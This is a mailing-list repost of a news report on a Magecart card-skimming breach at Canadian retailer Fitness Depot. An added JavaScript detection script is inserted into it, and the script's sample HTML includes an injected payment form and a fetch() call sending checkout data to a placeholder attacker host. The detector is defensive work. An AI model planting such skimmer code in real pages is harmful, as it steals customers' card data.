[BreachExchange] Fitness Depot hit by data breach after ISP fails to 'activate the antivirus'

Destry Winant destry at riskbasedsecurity.com
Tue Jun 9 09:49:53 EDT 2020


Canadian retailer Fitness Depot has notified customers that their
personal and financial information was stolen following a breach that
affected the company's e-commerce platform last month.

Fitness Depot is the largest specialty exercise equipment retailer in
Canada, with 40 stores nationwide and two in the United States, in
Dallas and Houston, Texas.

Signs of a Magecart attack

Based on the info in the breach notification letter the company sent
to all potentially impacted individuals, the attack has all the signs
of a textbook Magecart attack where the threat actors were able to
compromise Fitness Depot's online store and inject a malicious form
designed to harvest and exfiltrate customer information.

In such attacks, cybercrime groups known as Magecart groups hack
e-commerce stores and inject malicious JavaScript-based scripts into
their checkout pages as part of web skimming (aka e-skimming) attacks.

The attackers' end goal is to steal all the payment or personal
information submitted by the compromised sites' customers and to
collect it on remote servers under their control.
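As an added illustration of the detection side of the web-skimming technique described above (this is example code, not from the original post or from Sansec), the following script flags script sources, form actions and inline-script URLs on a checkout page whose host is not on the store's own allowlist. The allowlist, the host names and the sample HTML are constructed.

```javascript
// Added example: allowlist check for a checkout page's outbound targets.
// The allowlist, all host names and the sample HTML below are constructed.
const ALLOWED_HOSTS = new Set(['shop.example', 'js.payments.example']); // assumed

// Collect script src= and form action= attributes plus absolute URLs found in
// inline <script> bodies, where a skimmer's exfiltration call usually lives.
function extractUrls(html) {
  const urls = new Set();
  const attrRe = /<(?:script|form)\b[^>]*?\b(?:src|action)\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = attrRe.exec(html)) !== null) urls.add(m[1]);
  const inlineRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  while ((m = inlineRe.exec(html)) !== null) {
    for (const u of m[1].match(/https?:\/\/[^\s"'`)]+/g) || []) urls.add(u);
  }
  return [...urls];
}

// Resolve a possibly relative URL against the page URL; null if unparsable.
function hostOf(raw, pageUrl) {
  try { return new URL(raw, pageUrl).hostname; } catch { return null; }
}

// Return every URL whose host is not on the allowlist: the kind of finding a
// crawler such as the one cited in the article would raise for review.
function findUnexpectedHosts(html, pageUrl, allowed = ALLOWED_HOSTS) {
  return extractUrls(html)
    .map((url) => ({ url, host: hostOf(url, pageUrl) }))
    .filter(({ host }) => host !== null && !allowed.has(host));
}

// Constructed checkout page: two legitimate scripts, one injected form and an
// inline script that posts to a placeholder attacker host on submit.
const SAMPLE_HTML = `
<html><body>
<script src="/js/checkout.js"></script>
<script src="https://js.payments.example/sdk.js"></script>
<form id="pay" action="https://collect.attacker-placeholder.example/submit" method="post">
  <input name="card"><input name="cvv"><button>Pay</button>
</form>
<script>
  document.getElementById('pay').addEventListener('submit', function () {
    fetch('https://collect.attacker-placeholder.example/collect');
  });
</script>
</body></html>`;

console.log(findUnexpectedHosts(SAMPLE_HTML, 'https://shop.example/checkout'));
```

Run against a real store, the allowlist would hold the shop's own origin and its contracted payment and analytics providers; anything else deserves a look.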

Digital skimming detection security firm Sansec spotted the payment
card skimmers injected in Fitness Depot's e-commerce platform between
April 2 and May 17, as shown by a public crawler detection report
shared with BleepingComputer by the company's CEO and founder Willem
de Groot.

Not all customers were affected

In a letter sent to affected customers, the company says that the
attackers may have accessed or stolen the information of clients "who
made purchases for delivery and or who made purchases for in-store
pick up at one of our retail locations," the letter reads.

The information accessed or harvested by the attackers may have
included the impacted customers' name, address, email address,
telephone number, and credit card number.

The breach goes as far back as February 18, 2020, according to Fitness
Depot's data breach notification, and it started with a malicious form
being injected within the online store.

"Once our customers where (sic) redirected to this form the customer
information was copied without the authorization or knowledge of
Fitness Depot," the company says. "This is how the personal
information was captured and stolen."

Only customers with home delivery were impacted between February 18
and April 27, while from April 28 to May 22 "any customer that
ordered product for Home delivery or ordered product for in-store
pick-up could have been potentially affected."

The ISP gets blamed for the breach

Fitness Depot blames its internet service provider (ISP) for the data
breach saying that "[b]ased on our preliminary findings it appears our
Internet Service Provider [ISP] neglected to activate the anti-virus
software on our account."

It is not yet known what the Canadian fitness retailer refers to, since
it is not an ISP's job to protect its customers' e-commerce platforms
with anti-malware solutions.

BleepingComputer has reached out to Fitness Depot for more details but
had not heard back at the time of this publication.

Additionally, while Fitness Depot said that "personal information was
captured and stolen," the company also says that it "has no knowledge
that any of our customer information was compromised in any manner."

Fitness Depot also advises customers to keep an eye out for identity
theft or fraud attempts by monitoring their free credit reports and
reviewing account statements.

Update June 8: Added information on credit card skimmer scripts found
on Fitness Depot's online store.
